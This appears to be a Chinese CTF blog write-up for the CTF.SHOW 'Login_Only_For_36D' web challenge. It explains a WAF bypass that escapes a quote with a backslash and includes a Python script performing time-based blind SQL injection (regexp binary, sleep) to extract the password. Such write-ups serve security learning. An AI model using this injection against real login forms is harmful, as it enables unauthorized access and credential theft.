「配枪朱丽叶。」 「配枪朱丽叶。」
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
我的主页 › CTF › [CTF.SHOW]Login_Only_For_36D1 min read
#CTF#

[CTF.SHOW]Login_Only_For_36D1 min read

1月前
38 0

36D杯的其他部分题目:戳我

Q:为啥这题没和它们放一起?A:后做的,我懒,而且忘记了。


源代码有以下两行注释:

<!-- if (!preg_match('/admin/', $uname)) die; -->
<!-- select * from 36d_user where username='$uname' and password='$passwd'; -->

用户名必须包含admin,其后如果输入'、substr、ascii、mid、||、空格、-、等号,>,<均会触发WAF。

使用\注释掉'$uname'尾部的单引号,后面跟上or+注入语句。使用regexp进行时间盲注(为真页面无变化),空格用/**/代替,还需要注意mysql的正则不区分大小写,如果要区分的话,要在regexp后加 binary关键字。

import requests
import string
import time

url = r"http://ed977ea3-7f14-4a79-b591-1e42372a53cd.chall.ctf.show/"
dic = string.ascii_letters+string.digits
data = {
    'username':'admin\\',
    'password':''
}
flag = ""
for i in range(30):
    for j in dic:
        password = 'or/**/if((password/**/regexp/**/binary/**/"^'+flag+j+'"),sleep(4),1)#'
        # print(password)
        data['password']=password
        
        startTime=time.time()
        r = requests.post(url,data=data)
        
        if(time.time()-startTime) >= 3:
            flag += j
            print(flag)
            break
0 0
Shaw Root
# ctf-show# sql注入# web
相关文章
[SWPU2019]Web3
[Bugku]web36(注入、命令执行)
[HackTheBox]Passage靶机通关记录
[Bugku]web38(基于布尔的SQL盲注)
密码保护:[CTF.SHOW]WEB入门-jwt做题记录(345~349)
头像
Shaw Root站长
> 前路仍有明月共爱河。
131文章 0评论 127获赞
随便看看:)
[BJDCTF2020]EzPHP
9月前
[高校战“疫”网络安全分享赛]ez_mem&usb
10月前
[WUSTCTF2020]颜值成绩查询
9月前
[MRCTF2020]套娃
4月前
[Vulnhub]DC-1靶机通关记录
7月前
  • 旧站
  • 我的知乎
  • Riro
  • 7i4n2h3n9
  • EDS
  • 熵增
  • 紫哥purplet
  • 夏风
  • N0vice
  • Ga1@xy
  • prontosil
  • FzWjScJ
  • Retr_0
  • L1near
  • 1p0ch
  • β-AS
  • Match
  • Dizzyk
  • Y1ng
  • 偏有宸机
  • Van1sh
  • Fstone
  • Kali’s Blog
  • Airtail
  • False
Copyright © 2020-2021 「配枪朱丽叶。」. Designed by nicetheme. 百度统计 载入天数... 载入时分秒...